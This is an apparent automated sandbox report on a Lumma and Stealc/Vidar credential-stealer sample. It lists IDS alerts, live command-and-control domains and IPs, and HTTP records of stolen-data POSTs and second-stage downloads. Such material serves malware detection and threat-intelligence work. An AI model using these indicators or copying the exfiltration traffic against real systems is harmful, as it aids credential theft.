Source: Network traffic Suricata IDS: 2056400 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mysterisop .site) : 192.168.2.8:55865 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056402 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (questionsmw .store) : 192.168.2.8:54212 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056392 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abnomalrkmu .site) : 192.168.2.8:54546 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056406 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (snarlypagowo .site) : 192.168.2.8:61121 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056410 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (treatynreit .site) : 192.168.2.8:59551 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.8:56268 -> 45.132.206.251:80
Source: Network traffic Suricata IDS: 2056408 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soldiefieop .site) : 192.168.2.8:52448 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056396 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chorusarorp .site) : 192.168.2.8:63060 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.8:56237 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.8:56237
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.8:56238
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:56266 -> 172.67.166.76:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:56266 -> 172.67.166.76:443
Source: Malware configuration extractor URLs: treatynreit.site
Source: Malware configuration extractor URLs: questionsmw.stor
Source: Malware configuration extractor URLs: mysterisop.site
Source: Malware configuration extractor URLs: soldiefieop.site
Source: Malware configuration extractor URLs: abnomalrkmu.site
Source: Malware configuration extractor URLs: absorptioniw.site
Source: Malware configuration extractor URLs: snarlypagowo.site
Source: Malware configuration extractor URLs: chorusarorp.site
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199780418869
Source: global traffic TCP traffic: 192.168.2.8:56235 -> 162.159.36.2:53
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 03 Oct 2024 13:15:14 GMTContent-Type: application/octet-streamContent-Length: 540536Last-Modified: Thu, 03 Oct 2024 12:52:19 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fe9383-83f78"X-Content-Type-Options: nosniffAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 49.12.197.9 49.12.197.9
Source: Joe Sandbox View IP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox View IP Address: 147.45.44.104 147.45.44.104
Source: Joe Sandbox View ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56237 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49714 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49713 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49715 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56240 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56239 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56238 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56241 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56244 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56242 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56245 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56247 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56249 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56250 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56251 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56252 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56253 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56257 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56256 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56255 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56254 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56258 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56265 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:56259 -> 147.45.44.104:80
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56262 -> 49.12.197.9:443
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFIIIJJKJJKEBGIDGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAEBAFBGIDHCBFHIECFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFCFHJDBKJKEBFHJEHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 5957Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAECAFHDBGIDGCAEHJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCGDAAKFHIDBFIDBKFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 1081Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAECFCAAECBGDGDHIEHJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBAKKJDBKJJJKFHDAEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGDHJECFCFCAKFHCFIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 130417Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBGIIDBKEBFBGCAEBAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFBKECAKFCAAAKJDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: advocachark.store
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: playd.healthnlife.pkCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: cowod.hopto.orgContent-Length: 3177Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 4_2_00406963
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.ste equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
Source: global traffic DNS traffic detected: DNS query: playd.healthnlife.pk
Source: global traffic DNS traffic detected: DNS query: soldiefieop.site
Source: global traffic DNS traffic detected: DNS query: questionsmw.store
Source: global traffic DNS traffic detected: DNS query: abnomalrkmu.site
Source: global traffic DNS traffic detected: DNS query: chorusarorp.site
Source: global traffic DNS traffic detected: DNS query: treatynreit.site
Source: global traffic DNS traffic detected: DNS query: snarlypagowo.site
Source: global traffic DNS traffic detected: DNS query: mysterisop.site
Source: global traffic DNS traffic detected: DNS query: absorptioniw.site
Source: global traffic DNS traffic detected: DNS query: advocachark.store
Source: global traffic DNS traffic detected: DNS query: cowod.hopto.org
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: Http://cowod.hopto.org/form-data;
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, a43486128347[1].exe.4.dr, CBFCFBFBFB.exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.IDAAECKJDAK
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.IDAAECVWXYZ1234567890isposition:
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.CAEBAK
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.orgDAAEC--tent-Disposition:
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.orgDAAEContent-Disposition:
Source: file.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hoptoAAKJDAK
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hoptoGCAEBAK
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, a43486128347[1].exe.4.dr, CBFCFBFBFB.exe.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: CBFCFBFBFB.exe.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, a43486128347[1].exe.4.dr, CBFCFBFBFB.exe.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
